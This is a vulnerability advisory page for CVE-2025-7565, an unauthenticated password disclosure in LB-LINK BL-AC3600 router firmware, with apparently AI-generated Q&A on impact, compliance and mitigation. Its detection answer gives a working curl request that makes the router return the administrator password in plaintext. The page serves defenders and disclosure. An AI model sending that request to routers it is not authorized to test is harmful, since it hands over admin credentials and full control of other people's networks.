CVE-2025-7565
BaseFortify
Publication date: 2025-07-14
Last updated on: 2025-07-17
Assigner: VulDB
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| lb-link | bl-ac3600_firmware | to 1.0.22 (inc) |
| lb-link | bl-ac3600 | * |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
| CWE-200 | The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. |
| CWE-522 | The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2025-7565 is a critical information disclosure vulnerability in the LB-LINK BL-AC3600 router firmware up to version 1.0.22. It exists in the web management interface, specifically in the geteasycfg function of the /cgi-bin/lighttpd.cgi endpoint. By sending a crafted HTTP request with a specific JSON payload, an attacker can retrieve the administrator password in plaintext without any authentication. This allows the attacker to gain full control over the router remotely. [1, 2]
How can this vulnerability impact me? :
This vulnerability can lead to unauthorized disclosure of the router's administrator password, allowing an attacker to gain full control over the device remotely. With control over the router, the attacker can manipulate network traffic, intercept sensitive data, disrupt network services, or use the device as a foothold for further attacks within the network. [1, 2]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
This vulnerability exposes sensitive information (administrator password) to unauthorized actors, which can lead to unauthorized access and potential data breaches. Such incidents can violate data protection requirements under standards like GDPR and HIPAA, which mandate safeguarding sensitive information and ensuring confidentiality. Therefore, exploitation of this vulnerability could result in non-compliance with these regulations. [2]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by sending an HTTP request to the router's /cgi-bin/lighttpd.cgi endpoint with the JSON payload {"type":"geteasycfg"}. If the device responds with the administrator password in plaintext within the password field, it is vulnerable. A simple detection command using curl would be: curl -X POST http://<router-ip>/cgi-bin/lighttpd.cgi -d '{"type":"geteasycfg"}' -H 'Content-Type: application/json' and then checking the response for the password field. [1, 2]
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps include implementing restrictive firewall rules to block unauthorized remote access to the vulnerable /cgi-bin/lighttpd.cgi interface on the LB-LINK BL-AC3600 router. Since the vendor has not provided a patch or response, preventing external access to the web management interface is critical to reduce risk. [2]